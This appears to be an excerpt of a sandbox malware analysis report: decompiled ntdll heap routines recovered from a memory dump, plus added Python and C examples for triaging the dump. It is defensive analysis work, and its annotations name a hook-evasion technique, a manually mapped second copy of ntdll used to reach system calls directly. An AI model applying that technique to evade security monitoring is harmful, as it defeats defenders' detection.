                                          							_t513 = _v48;
                                          							goto L33;
                                          						}
                                          						__eflags =  *_v12 - 3;
                                          						_t513 = _v48;
                                          						if( *_v12 == 3) {
                                          							goto L27;
                                          						}
                                          						__eflags = _t460;
                                          						if(_t460 == 0) {
                                          							goto L9;
                                          						}
                                          						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
                                          						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
                                          							goto L9;
                                          						}
                                          						goto L27;
                                          					}
                                          				}
                                          				_t445 = _a4;
                                          				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
                                          					_t513 = __edx;
                                          					goto L10;
                                          				}
                                          				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
                                          				_v20 = _t433;
                                          				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
                                          					_t513 = _t539;
                                          					goto L9;
                                          				} else {
                                          					_t437 = E019799BF(__ecx, __edx,  &_a4, 0);
                                          					_t445 = _a4;
                                          					_t514 = _t437;
                                          					_v56 = _t514;
                                          					if(_t445 - 0x201 > 0xfbff) {
                                          						goto L14;
                                          					} else {
                                          						E0197A830(__ecx, _t514, _t445);
                                          						_t506 =  *(_t553 + 0x238);
                                          						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
                                          						_t246 = _t506 >> 4;
                                          						if(_t551 < _t506 - _t246) {
                                          							_t508 =  *(_t553 + 0x23c);
                                          							_t246 = _t508 >> 2;
                                          							__eflags = _t551 - _t508 - _t246;
                                          							if(_t551 > _t508 - _t246) {
                                          								_t246 = E0198ABD8(_t553);
                                          								 *(_t553 + 0x23c) = _t551;
                                          								 *(_t553 + 0x238) = _t551;
                                          							}
                                          						}
                                          						goto L7;
                                          					}
                                          				}
                                          			}
                                          0x0197a309
                                          0x0197a316
                                          0x0197a319
                                          0x0197a31d
                                          0x0197a32d
                                          0x0197a331
                                          0x019c1e0d
                                          0x019c1e10
                                          0x0197a3cb
                                          0x0197a3cb
                                          0x0197a3bd
                                          0x0197a3c3
                                          0x0197a3c3
                                          0x0197a33a
                                          0x019c1e17
                                          0x019c1e1b
                                          0x019c1e1d
                                          0x019c1e2f
                                          0x019c1e34
                                          0x019c1e36
                                          0x019c1e3c
                                          0x019c1e3c
                                          0x019c1e3c
                                          0x019c1e3c
                                          0x019c1e36
                                          0x019c1e42
                                          0x019c1e45
                                          0x019c1e47
                                          0x0197a3f8
                                          0x0197a3f8
                                          0x0197a3fb
                                          0x0197a3fd
                                          0x019c1e50
                                          0x0197a403
                                          0x0197a411
                                          0x0197a411
                                          0x0197a411
                                          0x0197a41e
                                          0x0197a420
                                          0x0197a424
                                          0x0197a427
                                          0x0197a7c9
                                          0x0197a7cd
                                          0x0197a7d2
                                          0x0197a7d9
                                          0x0197a7e0
                                          0x0197a7e3
                                          0x0197a7ed
                                          0x0197a7f3
                                          0x0197a7f9
                                          0x0197a7ff
                                          0x0197a802
                                          0x0197a807
                                          0x0197a809
                                          0x0197a809
                                          0x0197a809
                                          0x0197a80f
                                          0x0197a80f
                                          0x0197a812
                                          0x0197a81c
                                          0x0197a821
                                          0x0197a824
                                          0x0197a42d
                                          0x0197a42d
                                          0x0197a42d
                                          0x0197a42d
                                          0x0197a42d
                                          0x0197a436
                                          0x0197a43a
                                          0x0197a609
                                          0x0197a60d
                                          0x0197a612
                                          0x0197a616
                                          0x0197a61a
                                          0x019c1e57
                                          0x019c1e59
                                          0x00000000
                                          0x00000000
                                          0x019c1e5f
                                          0x0197a620
                                          0x0197a627
                                          0x019c1e64
                                          0x019c1e66
                                          0x019c1e6c
                                          0x019c1e72
                                          0x019c1e76
                                          0x019c1e95
                                          0x019c1e9a
                                          0x019c1e78
                                          0x019c1e8d
                                          0x019c1e92
                                          Disassembly listing: only the address column survived extraction (the instruction text for each address is not preserved). The addresses fall in 0x0197a340-0x0197a7bc and 0x019c1e66-0x019c2295 of the 0x01930000 memory dump, with 0x00000000 entries interleaved.

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-523794902
                                          • Opcode ID: 2401aef315819036b67485b5931cbe61c9438d97fd6849729e47e274d2735cb4
                                          • Instruction ID: 08b4af9c4f85cc9c22a52dde218ffa1c954fe8b36f85de5b046194c6663d54b7
                                          • Opcode Fuzzy Hash: 2401aef315819036b67485b5931cbe61c9438d97fd6849729e47e274d2735cb4
                                          • Instruction Fuzzy Hash: 7742CF316083829FD715DF28C884B2EBBE9FF98A04F18496DE58A8B352D734D941CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%
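
The four strings listed above are assertion messages from the Windows heap manager, which is part of ntdll.dll, and the dump is flagged as based on a PE image at 0x01930000. In a 32-bit process the loader's own ntdll sits far higher in the address space, so a PE image carrying ntdll strings at a low, privately allocated address is worth checking as a second, manually mapped copy of ntdll, the kind used to reach system calls without passing through user-mode inline hooks. The report does not itself draw that conclusion, so treat it as a hypothesis to verify against the process's loaded-module list. The Python below is an added example, not part of this report or of Joe Sandbox's tooling, that triages a dumped region for exactly those signs. It assumes the meaning of the .sdmp file-name fields other than the base address (the fifth field is read as a page-protection value), and it runs over a constructed stand-in buffer rather than the real dump.

```python
import re
import struct

# The four strings the report lists for this dump. All of them are assertion
# strings from the Windows heap manager, which lives in ntdll.dll.
NTDLL_MARKERS = (b"HEAP: ", b"(!TrailingUCR)", b"(UCRBlock != NULL)", b"HEAP[%wZ]:")

PAGE_EXECUTE_READWRITE = 0x40  # Windows memory-protection constant

# Joe Sandbox memory-dump file name, e.g.
# 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp
# Only the fourth field is confirmed by the report ("Offset: 01930000");
# reading the fifth field as a page-protection value is an assumption.
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<seq>[0-9a-f]{8})\.(?P<ts>\d+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<prot>[0-9a-f]{8})\.(?P<kind>[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)


def parse_sdmp_name(name):
    """Split an .sdmp file name into its fields (base address and protection as ints)."""
    m = SDMP_RE.match(name)
    if m is None:
        raise ValueError("not a .sdmp file name: %r" % name)
    return {
        "proc": int(m["proc"], 16),
        "base": int(m["base"], 16),
        "protection": int(m["prot"], 16),
    }


def find_pe_headers(buf):
    """Offsets of every 'MZ' whose e_lfanew points at a 'PE\\0\\0' signature."""
    hits = []
    pos = buf.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(buf):
            e_lfanew = struct.unpack_from("<I", buf, pos + 0x3C)[0]
            pe = pos + e_lfanew
            if 0x40 <= e_lfanew and buf[pe:pe + 4] == b"PE\0\0":
                hits.append(pos)
        pos = buf.find(b"MZ", pos + 1)
    return hits


def read_image_base(buf, off):
    """ImageBase from the optional header of the PE at `off` (PE32 or PE32+), or None."""
    pe = off + struct.unpack_from("<I", buf, off + 0x3C)[0]
    opt = pe + 24  # optional header follows the 4-byte signature and 20-byte COFF header
    magic = struct.unpack_from("<H", buf, opt)[0]
    if magic == 0x10B:  # PE32: ImageBase is the DWORD at optional-header offset 28
        return struct.unpack_from("<I", buf, opt + 28)[0]
    if magic == 0x20B:  # PE32+: ImageBase is the QWORD at optional-header offset 24
        return struct.unpack_from("<Q", buf, opt + 24)[0]
    return None


def classify_region(name, buf):
    """Triage one dumped region: is it a PE image, does it carry ntdll strings,
    was it dumped from writable+executable memory, and does its stored ImageBase
    differ from the address it was dumped at? The 'looks_like_ntdll_copy'
    verdict is this example's own heuristic, not a Joe Sandbox signature."""
    fields = parse_sdmp_name(name)
    pes = find_pe_headers(buf)
    markers = [m.decode() for m in NTDLL_MARKERS if m in buf]
    image_base = read_image_base(buf, pes[0]) if pes else None
    return {
        "base": fields["base"],
        "rwx": fields["protection"] == PAGE_EXECUTE_READWRITE,
        "pe_offsets": pes,
        "markers": markers,
        "image_base": image_base,
        "relocated": image_base is not None and image_base != fields["base"],
        "looks_like_ntdll_copy": bool(pes) and len(markers) >= 2,
    }


def build_sample_dump():
    """Constructed stand-in for the dumped region (not the sample's real memory):
    a minimal PE32 header followed by the strings the report lists."""
    hdr = bytearray(0x200)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)                  # e_lfanew
    hdr[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HH", hdr, 0x84, 0x14C, 0)             # Machine = i386, NumberOfSections = 0
    struct.pack_into("<H", hdr, 0x80 + 20, 0xE0)             # SizeOfOptionalHeader
    struct.pack_into("<H", hdr, 0x80 + 24, 0x10B)            # PE32 magic
    struct.pack_into("<I", hdr, 0x80 + 24 + 28, 0x77D40000)  # ImageBase (hypothetical value)
    return bytes(hdr) + b"\0".join(NTDLL_MARKERS) + b"\0"


if __name__ == "__main__":
    name = "00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp"
    for key, value in classify_region(name, build_sample_dump()).items():
        shown = hex(value) if isinstance(value, int) and not isinstance(value, bool) else value
        print("%-22s %s" % (key, shown))
```

To run it over the real dump, replace build_sample_dump() with the bytes of the .sdmp file. Note that `relocated` alone proves nothing: ASLR rebases the loader's ntdll too, so the stored ImageBase will differ from the mapped address there as well. The discriminating facts are a second PE image with ntdll strings at an address that is not the one in the module list, and an RWX protection on a region that holds it.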

                                          C-Code - Quality: 96%
                                          			E01963D34(signed int* __ecx) {
                                          				signed int* _v8;
                                          				char _v12;
                                          				signed int* _v16;
                                          				signed int* _v20;
                                          				char _v24;
                                          				signed int _v28;
                                          				signed int _v32;
                                          				char _v36;
                                          				signed int _v40;
                                          				signed int _v44;
                                          				signed int* _v48;
                                          				signed int* _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				char _v68;
                                          				signed int _t140;
                                          				signed int _t161;
                                          				signed int* _t236;
                                          				signed int* _t242;
                                          				signed int* _t243;
                                          				signed int* _t244;
                                          				signed int* _t245;
                                          				signed int _t255;
                                          				void* _t257;
                                          				signed int _t260;
                                          				void* _t262;
                                          				signed int _t264;
                                          				void* _t267;
                                          				signed int _t275;
                                          				signed int* _t276;
                                          				short* _t277;
                                          				signed int* _t278;
                                          				signed int* _t279;
                                          				signed int* _t280;
                                          				short* _t281;
                                          				signed int* _t282;
                                          				short* _t283;
                                          				signed int* _t284;
                                          				void* _t285;
                                          
                                          				_v60 = _v60 | 0xffffffff;
                                          				_t280 = 0;
                                          				_t242 = __ecx;
                                          				_v52 = __ecx;
                                          				_v8 = 0;
                                          				_v20 = 0;
                                          				_v40 = 0;
                                          				_v28 = 0;
                                          				_v32 = 0;
                                          				_v44 = 0;
                                          				_v56 = 0;
                                          				_t275 = 0;
                                          				_v16 = 0;
                                          				if(__ecx == 0) {
                                          					_t280 = 0xc000000d; /* STATUS_INVALID_PARAMETER: no context block was passed */
                                          					_t140 = 0;
                                          					L50:
                                          					 *_t242 =  *_t242 | 0x00000800;
                                          					_t242[0x13] = _t140;
                                          					_t242[0x16] = _v40;
                                          					_t242[0x18] = _v28;
                                          					_t242[0x14] = _v32;
                                          					_t242[0x17] = _t275;
                                          					_t242[0x15] = _v44;
                                          					_t242[0x11] = _v56;
                                          					_t242[0x12] = _v60;
                                          					return _t280;
                                          				}
                                          				/* Each E01961B8F call looks up a named value into a heap buffer returned through &_v8
                                          				   (with its size in _v12); the caller frees that buffer once it has read it. */
                                          				if(E01961B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                          					_v56 = 1;
                                          					if(_v8 != 0) {
                                          					/* [fs:0x30] is the PEB and +0x18 its ProcessHeap field on x86; the
                                          					   (heap, flags, pointer) argument shape matches RtlFreeHeap */
                                          					L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                          					}
                                          					_v8 = _t280;
                                          				}
                                          				if(E01961B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                          					_v60 =  *_v8;
                                          					L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                          					_v8 = _t280;
                                          				}
                                          				if(E01961B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                          					L16:
                                          					if(E01961B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                          						L28:
                                          						if(E01961B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                          							L46:
                                          							_t275 = _v16;
                                          							L47:
                                          							_t161 = 0;
                                          							L48:
                                          							if(_v8 != 0) {
                                          								L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                          							}
                                          							_t140 = _v20;
                                          							if(_t140 != 0) {
                                          								if(_t275 != 0) {
                                          									L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                          									_t275 = 0;
                                          									_v28 = 0;
                                          									_t140 = _v20;
                                          								}
                                          							}
                                          							goto L50;
                                          						}
                                          						_t167 = _v12;
                                          						_t255 = _v12 + 4;
                                          						_v44 = _t255;
                                          						if(_t255 == 0) {
                                          							_t276 = _t280;
                                          							_v32 = _t280;
                                          						} else {
                                          						/* (heap, flags, size) with flags 8 == HEAP_ZERO_MEMORY matches RtlAllocateHeap;
                                          						   the leading _t255 is most likely a decompiler register artifact */
                                          						_t276 = L01974620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                          							_t167 = _v12;
                                          							_v32 = _t276;
                                          						}
                                          						if(_t276 == 0) {
                                          							_v44 = _t280;
                                          							_t280 = 0xc0000017; /* STATUS_NO_MEMORY */
                                          							goto L46;
                                          						} else {
                                          							E0199F3E0(_t276, _v8, _t167);
                                          							_v48 = _t276;
                                          							/* E019A1370 returns a pointer to the next occurrence of the wide character stored at
                                          							   0x1934e90, or 0; the loop below NUL-terminates at it and advances one wchar, i.e.
                                          							   the value string is split on that delimiter and each piece is validated */
                                          							_t277 = E019A1370(_t276, 0x1934e90);
                                          							_pop(_t257);
                                          							if(_t277 == 0) {
                                          								L38:
                                          								_t170 = _v48;
                                          								if( *_v48 != 0) {
                                          									E0199BB40(0,  &_v68, _t170);
                                          									if(L019643C0( &_v68,  &_v24) != 0) {
                                          										_t280 =  &(_t280[0]);
                                          									}
                                          								}
                                          								if(_t280 == 0) {
                                          									_t280 = 0;
                                          									L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                          									_v44 = 0;
                                          									_v32 = 0;
                                          								} else {
                                          									_t280 = 0;
                                          								}
                                          								_t174 = _v8;
                                          								if(_v8 != 0) {
                                          									L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                          								}
                                          								_v8 = _t280;
                                          								goto L46;
                                          							}
                                          							_t243 = _v48;
                                          							do {
                                          								 *_t277 = 0;
                                          								_t278 = _t277 + 2;
                                          								E0199BB40(_t257,  &_v68, _t243);
                                          								if(L019643C0( &_v68,  &_v24) != 0) {
                                          									_t280 =  &(_t280[0]);
                                          								}
                                          								_t243 = _t278;
                                          								_t277 = E019A1370(_t278, 0x1934e90);
                                          								_pop(_t257);
                                          							} while (_t277 != 0);
                                          							_v48 = _t243;
                                          							_t242 = _v52;
                                          							goto L38;
                                          						}
                                          					}
                                          					_t191 = _v12;
                                          					_t260 = _v12 + 4;
                                          					_v28 = _t260;
                                          					if(_t260 == 0) {
                                          						_t275 = _t280;
                                          						_v16 = _t280;
                                          					} else {
                                          						_t275 = L01974620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                          						_t191 = _v12;
                                          						_v16 = _t275;
                                          					}
                                          					if(_t275 == 0) {
                                          						_v28 = _t280;
                                          						_t280 = 0xc0000017;
                                          						goto L47;
                                          					} else {
                                          						E0199F3E0(_t275, _v8, _t191);
                                          						_t285 = _t285 + 0xc;
                                          						_v48 = _t275;
                                          						_t279 = _t280;
                                          						_t281 = E019A1370(_v16, 0x1934e90);
                                          						_pop(_t262);
                                          						if(_t281 != 0) {
                                          							_t244 = _v48;
                                          							do {
                                          								 *_t281 = 0;
                                          								_t282 = _t281 + 2;
                                          								E0199BB40(_t262,  &_v68, _t244);
                                          								if(L019643C0( &_v68,  &_v24) != 0) {
                                          									_t279 =  &(_t279[0]);
                                          								}
                                          								_t244 = _t282;
                                          								_t281 = E019A1370(_t282, 0x1934e90);
                                          								_pop(_t262);
                                          							} while (_t281 != 0);
                                          							_v48 = _t244;
                                          							_t242 = _v52;
                                          						}
                                          						_t201 = _v48;
                                          						_t280 = 0;
                                          						if( *_v48 != 0) {
                                          							E0199BB40(_t262,  &_v68, _t201);
                                          							if(L019643C0( &_v68,  &_v24) != 0) {
                                          								_t279 =  &(_t279[0]);
                                          							}
                                          						}
                                          						if(_t279 == 0) {
                                          							L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                          							_v28 = _t280;
                                          							_v16 = _t280;
                                          						}
                                          						_t202 = _v8;
                                          						if(_v8 != 0) {
                                          							L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                          						}
                                          						_v8 = _t280;
                                          						goto L28;
                                          					}
                                          				}
                                          				_t214 = _v12;
                                          				_t264 = _v12 + 4;
                                          				_v40 = _t264;
                                          				if(_t264 == 0) {
                                          					_v20 = _t280;
                                          				} else {
                                          					_t236 = L01974620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                          					_t280 = _t236;
                                          					_v20 = _t236;
                                          					_t214 = _v12;
                                          				}
                                          				if(_t280 == 0) {
                                          					_t161 = 0;
                                          					_t280 = 0xc0000017;
                                          					_v40 = 0;
                                          					goto L48;
                                          				} else {
                                          					E0199F3E0(_t280, _v8, _t214);
                                          					_t285 = _t285 + 0xc;
                                          					_v48 = _t280;
                                          					_t283 = E019A1370(_t280, 0x1934e90);
                                          					_pop(_t267);
                                          					if(_t283 != 0) {
                                          						_t245 = _v48;
                                          						do {
                                          							 *_t283 = 0;
                                          							_t284 = _t283 + 2;
                                          							E0199BB40(_t267,  &_v68, _t245);
                                          							if(L019643C0( &_v68,  &_v24) != 0) {
                                          								_t275 = _t275 + 1;
                                          							}
                                          							_t245 = _t284;
                                          							_t283 = E019A1370(_t284, 0x1934e90);
                                          							_pop(_t267);
                                          						} while (_t283 != 0);
                                          						_v48 = _t245;
                                          						_t242 = _v52;
                                          					}
                                          					_t224 = _v48;
                                          					_t280 = 0;
                                          					if( *_v48 != 0) {
                                          						E0199BB40(_t267,  &_v68, _t224);
                                          						if(L019643C0( &_v68,  &_v24) != 0) {
                                          							_t275 = _t275 + 1;
                                          						}
                                          					}
                                          					if(_t275 == 0) {
                                          						L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                          						_v40 = _t280;
                                          						_v20 = _t280;
                                          					}
                                          					_t225 = _v8;
                                          					if(_v8 != 0) {
                                          						L019777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                          					}
                                          					_v8 = _t280;
                                          					goto L16;
                                          				}
			}

Instruction addresses for the listing above (per-line column, alignment lost in extraction): 0x01963d3c to 0x019640bd, with further blocks at 0x019b8213 to 0x019b837c

                                          Strings
                                          • Kernel-MUI-Language-SKU, xrefs: 01963F70
                                          • WindowsExcludedProcs, xrefs: 01963D6F
                                          • Kernel-MUI-Language-Allowed, xrefs: 01963DC0
                                          • Kernel-MUI-Language-Disallowed, xrefs: 01963E97
                                          • Kernel-MUI-Number-Allowed, xrefs: 01963D8C
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                          • API String ID: 0-258546922
                                          • Opcode ID: 17b5ebae708d6c42bb9fd3af2d4715db4083b1d78bcd3c0e37f78f57a129f334
                                          • Instruction ID: 494cd4f32512355e50e909a9234162a35d5b37d8189b56fddc528bba03a3806a
                                          • Opcode Fuzzy Hash: 17b5ebae708d6c42bb9fd3af2d4715db4083b1d78bcd3c0e37f78f57a129f334
                                          • Instruction Fuzzy Hash: 78F12A72D00619EBDB15DFD8C980EEEBBBDFF98650F15046AE509A7250E7349E01CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 29%
                                          			E019540E1(void* __edx) {
                                          				void* _t19;
                                          				void* _t29;
                                          
                                          				_t28 = _t19;
                                          				_t29 = __edx;
                                          				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
                                          					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                          						_push("HEAP: ");
                                          						E0195B150();
                                          					} else {
                                          						E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          					}
                                          					E0195B150("Invalid heap signature for heap at %p", _t28);
                                          					if(_t29 != 0) {
                                          						E0195B150(", passed to %s", _t29);
                                          					}
                                          					_push("\n");
                                          					E0195B150();
                                          					if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                          						 *0x1a46378 = 1;
                                          						asm("int3");
                                          						 *0x1a46378 = 0;
                                          					}
                                          					return 0;
                                          				}
                                          				return 1;
			}

Instruction addresses for the listing above (per-line column, alignment lost in extraction): 0x019540e6 to 0x019540f1, with further blocks at 0x019b042d to 0x019b049b

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, Offset: 01930000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
                                          • API String ID: 0-188067316
                                          • Opcode ID: 0c4da8617c1a9933e613530ddd8404b4c4d3a08ce3d6df0140676c4d79786c13
                                          • Instruction ID: 3eb7d8c8686a966d0d2a0eb63d19f1f187a5ad1d3f8052a9168f7f1ea1b0c2b7
                                          • Opcode Fuzzy Hash: 0c4da8617c1a9933e613530ddd8404b4c4d3a08ce3d6df0140676c4d79786c13
                                          • Instruction Fuzzy Hash: A1012836114281AED3A9DB79A54DF9777BAEBC1F31F18802DF40D5B6819AA89480CB20
                                          Uniqueness

                                          Uniqueness Score: -1.00%
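The routine E019540E1 above validates a heap by a single field: the DWORD at HEAP+0x60 must equal 0xEEFFEEFF, otherwise it prints the "Invalid heap signature" diagnostics and, if PEB.BeingDebugged is set, breaks into the debugger. The same test is useful when carving a process memory dump such as the one this report was produced from. The following is an added example, not code from the Joe Sandbox report or from ntdll: it applies that check to a raw image and lists page-aligned offsets that look like heap bases. The 0x60 offset is the one shown in the decompiled 32-bit ntdll of the analysis VM (other builds place the field elsewhere); the page alignment of heap bases, the helper names and the sample image are assumptions made for the demonstration.

```c
/* Added example (not from the report or from ntdll): locate candidate NT heap
 * structures in a raw memory image by the check E019540E1 performs, namely
 * that the DWORD at HEAP+0x60 equals 0xEEFFEEFF. The offset is that of the
 * 32-bit ntdll in the report; page-aligned heap bases and the sample image
 * are assumptions for this demo. */
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

#define HEAP_SIGNATURE        0xEEFFEEFFu
#define HEAP_SIGNATURE_OFFSET 0x60u    /* from the decompiled check above */
#define PAGE_SIZE             0x1000u  /* assumed alignment of heap bases */

/* Little-endian 32-bit read that works at any alignment. */
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Same test as E019540E1: 1 if the signature at heap_off+0x60 is intact,
 * 0 if it is wrong or the field would fall outside the image. */
int heap_signature_valid(const uint8_t *image, size_t image_len, size_t heap_off) {
    if (heap_off > image_len || image_len - heap_off < HEAP_SIGNATURE_OFFSET + 4)
        return 0;
    return rd32(image + heap_off + HEAP_SIGNATURE_OFFSET) == HEAP_SIGNATURE;
}

/* Walk the image one page at a time and collect offsets that pass the check.
 * Returns the total number of candidates; at most max_out are stored in out. */
size_t find_heap_candidates(const uint8_t *image, size_t image_len,
                            size_t *out, size_t max_out) {
    size_t n = 0;
    for (size_t off = 0; off + HEAP_SIGNATURE_OFFSET + 4 <= image_len; off += PAGE_SIZE) {
        if (heap_signature_valid(image, image_len, off)) {
            if (n < max_out) out[n] = off;
            n++;
        }
    }
    return n;
}

/* Constructed sample image (not a real dump): a fake heap at 0x3000 and a
 * decoy signature whose base 0x4010 is not page aligned, which a plain byte
 * scan for the pattern would report as a heap. */
#define IMG_LEN 0x6000u
static uint8_t g_image[IMG_LEN];

void build_sample_image(void) {
    static const uint8_t sig_le[4] = { 0xFF, 0xEE, 0xFF, 0xEE }; /* 0xEEFFEEFF */
    memset(g_image, 0, IMG_LEN);
    memcpy(g_image + 0x3000 + HEAP_SIGNATURE_OFFSET, sig_le, 4);
    memcpy(g_image + 0x4010 + HEAP_SIGNATURE_OFFSET, sig_le, 4);
}

int main(void) {
    size_t hits[8];
    build_sample_image();
    size_t n = find_heap_candidates(g_image, IMG_LEN, hits, 8);
    for (size_t i = 0; i < n && i < 8; i++)
        printf("candidate HEAP at image offset 0x%zx\n", hits[i]);
    return 0;
}
```

The page-aligned walk is what separates a real base from a stray copy of the pattern: the decoy at 0x4010 passes heap_signature_valid when asked about it directly, but never appears in the candidate list. On a real dump, feed the candidates into a fuller structure check (segment list, encoding, free lists) before trusting them.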

                                          C-Code - Quality: 70%
                                          			E0197A830(intOrPtr __ecx, signed int __edx, signed short _a4) {
                                          				void* _v5;
                                          				signed short _v12;
                                          				intOrPtr _v16;
                                          				signed int _v20;
                                          				signed short _v24;
                                          				signed short _v28;
                                          				signed int _v32;
                                          				signed short _v36;
                                          				signed int _v40;
                                          				intOrPtr _v44;
                                          				intOrPtr _v48;
                                          				signed short* _v52;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __ebp;
                                          				signed int _t131;
                                          				signed char _t134;
                                          				signed int _t138;
                                          				char _t141;
                                          				signed short _t142;
                                          				void* _t146;
                                          				signed short _t147;
                                          				intOrPtr* _t149;
                                          				intOrPtr _t156;
                                          				signed int _t167;
                                          				signed int _t168;
                                          				signed short* _t173;
                                          				signed short _t174;
                                          				intOrPtr* _t182;
                                          				signed short _t184;
                                          				intOrPtr* _t187;
                                          				intOrPtr _t197;
                                          				intOrPtr _t206;
                                          				intOrPtr _t210;
                                          				signed short _t211;
                                          				intOrPtr* _t212;
                                          				signed short _t214;
                                          				signed int _t216;
                                          				intOrPtr _t217;
                                          				signed char _t225;
                                          				signed short _t235;
                                          				signed int _t237;
                                          				intOrPtr* _t238;
                                          				signed int _t242;
                                          				unsigned int _t245;
                                          				signed int _t251;
                                          				intOrPtr* _t252;
                                          				signed int _t253;
                                          				intOrPtr* _t255;
                                          				signed int _t256;
                                          				void* _t257;
                                          				void* _t260;
                                          
                                          				_t256 = __edx;
                                          				_t206 = __ecx;
                                          				_t235 = _a4;
                                          				_v44 = __ecx;
                                          				_v24 = _t235;
                                          				if(_t235 == 0) {
                                          					L41:
                                          					return _t131;
                                          				}
                                          				_t251 = ( *(__edx + 4) ^  *(__ecx + 0x54)) & 0x0000ffff;
                                          				if(_t251 == 0) {
                                          					__eflags =  *0x1a48748 - 1;
                                          					if( *0x1a48748 >= 1) {
                                          						__eflags =  *(__edx + 2) & 0x00000008;
                                          						if(( *(__edx + 2) & 0x00000008) == 0) {
                                          							_t110 = _t256 + 0xfff; // 0xfe7
                                          							__eflags = (_t110 & 0xfffff000) - __edx;
                                          							if((_t110 & 0xfffff000) != __edx) {
                                          								_t197 =  *[fs:0x30];
                                          								__eflags =  *(_t197 + 0xc);
                                          								if( *(_t197 + 0xc) == 0) {
                                          									_push("HEAP: ");
                                          									E0195B150();
                                          									_t260 = _t257 + 4;
                                          								} else {
                                          									E0195B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                          									_t260 = _t257 + 8;
                                          								}
                                          								_push("((FreeBlock->Flags & HEAP_ENTRY_DECOMMITTED) || (ROUND_UP_TO_POWER2(FreeBlock, PAGE_SIZE) == (ULONG_PTR)FreeBlock))");
                                          								E0195B150();
                                          								_t257 = _t260 + 4;
                                          								__eflags =  *0x1a47bc8;
                                          								if(__eflags == 0) {
                                          									E01A12073(_t206, 1, _t251, __eflags);
                                          								}
                                          								_t235 = _v24;
                                          							}
                                          						}
                                          					}
                                          				}
                                          				_t134 =  *((intOrPtr*)(_t256 + 6));
                                          				if(_t134 == 0) {
                                          					_t210 = _t206;
                                          					_v48 = _t206;
                                          				} else {
                                          					_t210 = (_t256 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                          					_v48 = _t210;
                                          				}
                                          				_v5 =  *(_t256 + 2);
                                          				do {
                                          					if(_t235 > 0xfe00) {
                                          						_v12 = 0xfe00;
                                          						__eflags = _t235 - 0xfe01;
                                          						if(_t235 == 0xfe01) {
                                          							_v12 = 0xfdf0;
                                          						}
                                          						_t138 = 0;
                                          					} else {
